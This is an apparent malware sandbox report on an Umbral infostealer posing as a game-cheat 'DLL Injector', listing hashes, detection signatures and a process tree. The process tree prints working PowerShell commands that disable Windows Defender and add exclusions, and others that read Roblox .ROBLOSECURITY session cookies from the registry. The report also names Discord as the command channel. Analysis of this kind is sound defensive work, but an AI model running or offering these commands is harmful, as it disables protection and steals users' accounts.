Resubmissions
29-06-2024 16:53
240629-vd8x8s1fqg 10Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
29-06-2024 16:53
Behavioral task
behavioral1
Sample
CheatLoader.js
Resource
win7-20240508-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
CheatLoader.js
Resource
win10v2004-20240611-en
windows10-2004-x64
1 signatures
150 seconds
Behavioral task
behavioral3
Sample
Complex Softaim Cracked.exe
Resource
win7-20240419-en
windows7-x64
10 signatures
150 seconds
Behavioral task
behavioral4
Sample
Complex Softaim Cracked.exe
Resource
win10v2004-20240508-en
windows10-2004-x64
10 signatures
150 seconds
Behavioral task
behavioral5
Sample
DLL Injector.exe
Resource
win7-20240611-en
windows7-x64
11 signatures
150 seconds
General
-
Target
DLL Injector.exe
-
Size
232KB
-
MD5
3e87aa76b31c95481d99fb7960ce96f4
-
SHA1
bcd61df3abd7245df27a250996138675b258f01e
-
SHA256
8c18bb102c70d83000ae6d6f784da47b86a78359b2e6edfbfe915cb16ccb9a2a
-
SHA512
574d79517027edd422d857272d8a14d751c0b64851e2bd0cf6a698a56284a0b17783a209d405d09542b4c3fc044af2b02304293d4522a169cde8da684350c6dc
-
SSDEEP
6144:8loZMLrIkd8g+EtXHkv/iD4rPS0pbhS6F6AxDeebfHb8e1mo5iH/:aoZ0L+EP8rPS0pbhS6F6AxDeebLGH/
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral5/memory/2200-1-0x0000000000D10000-0x0000000000D50000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2256 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts DLL Injector.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 644 wmic.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2200 DLL Injector.exe 2256 powershell.exe 2560 powershell.exe 3000 powershell.exe 3044 powershell.exe 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2200 DLL Injector.exe Token: SeIncreaseQuotaPrivilege 2684 wmic.exe Token: SeSecurityPrivilege 2684 wmic.exe Token: SeTakeOwnershipPrivilege 2684 wmic.exe Token: SeLoadDriverPrivilege 2684 wmic.exe Token: SeSystemProfilePrivilege 2684 wmic.exe Token: SeSystemtimePrivilege 2684 wmic.exe Token: SeProfSingleProcessPrivilege 2684 wmic.exe Token: SeIncBasePriorityPrivilege 2684 wmic.exe Token: SeCreatePagefilePrivilege 2684 wmic.exe Token: SeBackupPrivilege 2684 wmic.exe Token: SeRestorePrivilege 2684 wmic.exe Token: SeShutdownPrivilege 2684 wmic.exe Token: SeDebugPrivilege 2684 wmic.exe Token: SeSystemEnvironmentPrivilege 2684 wmic.exe Token: SeRemoteShutdownPrivilege 2684 wmic.exe Token: SeUndockPrivilege 2684 wmic.exe Token: SeManageVolumePrivilege 2684 wmic.exe Token: 33 2684 wmic.exe Token: 34 2684 wmic.exe Token: 35 2684 wmic.exe Token: SeIncreaseQuotaPrivilege 2684 wmic.exe Token: SeSecurityPrivilege 2684 wmic.exe Token: SeTakeOwnershipPrivilege 2684 wmic.exe Token: SeLoadDriverPrivilege 2684 wmic.exe Token: SeSystemProfilePrivilege 2684 wmic.exe Token: SeSystemtimePrivilege 2684 wmic.exe Token: SeProfSingleProcessPrivilege 2684 wmic.exe Token: SeIncBasePriorityPrivilege 2684 wmic.exe Token: SeCreatePagefilePrivilege 2684 wmic.exe Token: SeBackupPrivilege 2684 wmic.exe Token: SeRestorePrivilege 2684 wmic.exe Token: SeShutdownPrivilege 2684 wmic.exe Token: SeDebugPrivilege 2684 wmic.exe Token: SeSystemEnvironmentPrivilege 2684 wmic.exe Token: SeRemoteShutdownPrivilege 2684 wmic.exe Token: SeUndockPrivilege 2684 wmic.exe Token: SeManageVolumePrivilege 2684 wmic.exe Token: 33 2684 wmic.exe Token: 34 2684 wmic.exe Token: 35 2684 wmic.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeIncreaseQuotaPrivilege 1612 wmic.exe Token: SeSecurityPrivilege 1612 wmic.exe Token: SeTakeOwnershipPrivilege 1612 wmic.exe Token: SeLoadDriverPrivilege 1612 wmic.exe Token: SeSystemProfilePrivilege 1612 wmic.exe Token: SeSystemtimePrivilege 1612 wmic.exe Token: SeProfSingleProcessPrivilege 1612 wmic.exe Token: SeIncBasePriorityPrivilege 1612 wmic.exe Token: SeCreatePagefilePrivilege 1612 wmic.exe Token: SeBackupPrivilege 1612 wmic.exe Token: SeRestorePrivilege 1612 wmic.exe Token: SeShutdownPrivilege 1612 wmic.exe Token: SeDebugPrivilege 1612 wmic.exe Token: SeSystemEnvironmentPrivilege 1612 wmic.exe Token: SeRemoteShutdownPrivilege 1612 wmic.exe Token: SeUndockPrivilege 1612 wmic.exe Token: SeManageVolumePrivilege 1612 wmic.exe Token: 33 1612 wmic.exe Token: 34 1612 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2200 wrote to memory of 2684 2200 DLL Injector.exe 28 PID 2200 wrote to memory of 2684 2200 DLL Injector.exe 28 PID 2200 wrote to memory of 2684 2200 DLL Injector.exe 28 PID 2200 wrote to memory of 2256 2200 DLL Injector.exe 31 PID 2200 wrote to memory of 2256 2200 DLL Injector.exe 31 PID 2200 wrote to memory of 2256 2200 DLL Injector.exe 31 PID 2200 wrote to memory of 2560 2200 DLL Injector.exe 33 PID 2200 wrote to memory of 2560 2200 DLL Injector.exe 33 PID 2200 wrote to memory of 2560 2200 DLL Injector.exe 33 PID 2200 wrote to memory of 3000 2200 DLL Injector.exe 35 PID 2200 wrote to memory of 3000 2200 DLL Injector.exe 35 PID 2200 wrote to memory of 3000 2200 DLL Injector.exe 35 PID 2200 wrote to memory of 3044 2200 DLL Injector.exe 37 PID 2200 wrote to memory of 3044 2200 DLL Injector.exe 37 PID 2200 wrote to memory of 3044 2200 DLL Injector.exe 37 PID 2200 wrote to memory of 1612 2200 DLL Injector.exe 39 PID 2200 wrote to memory of 1612 2200 DLL Injector.exe 39 PID 2200 wrote to memory of 1612 2200 DLL Injector.exe 39 PID 2200 wrote to memory of 1620 2200 DLL Injector.exe 41 PID 2200 wrote to memory of 1620 2200 DLL Injector.exe 41 PID 2200 wrote to memory of 1620 2200 DLL Injector.exe 41 PID 2200 wrote to memory of 2848 2200 DLL Injector.exe 43 PID 2200 wrote to memory of 2848 2200 DLL Injector.exe 43 PID 2200 wrote to memory of 2848 2200 DLL Injector.exe 43 PID 2200 wrote to memory of 2880 2200 DLL Injector.exe 45 PID 2200 wrote to memory of 2880 2200 DLL Injector.exe 45 PID 2200 wrote to memory of 2880 2200 DLL Injector.exe 45 PID 2200 wrote to memory of 644 2200 DLL Injector.exe 47 PID 2200 wrote to memory of 644 2200 DLL Injector.exe 47 PID 2200 wrote to memory of 644 2200 DLL Injector.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\DLL Injector.exe"C:\Users\Admin\AppData\Local\Temp\DLL Injector.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DLL Injector.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:644
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e5fb91e7ef66db677958dcb2daf191bd
SHA1d667502451cd887ed2566669a7afbb277f3cce7c
SHA256e8f08df6dea577d0866ddaa0ebc6cc361fdbed8da0c26c76c6c87b241c1a5830
SHA5122af00fd868fcfb9181a16fb14e935d3d2e6a044fa1e2fac3521322ea54d9de39ddb823c79ed502f35be7b3cc616d82d72e869a364d5ebf3b43731ab45bcecaf7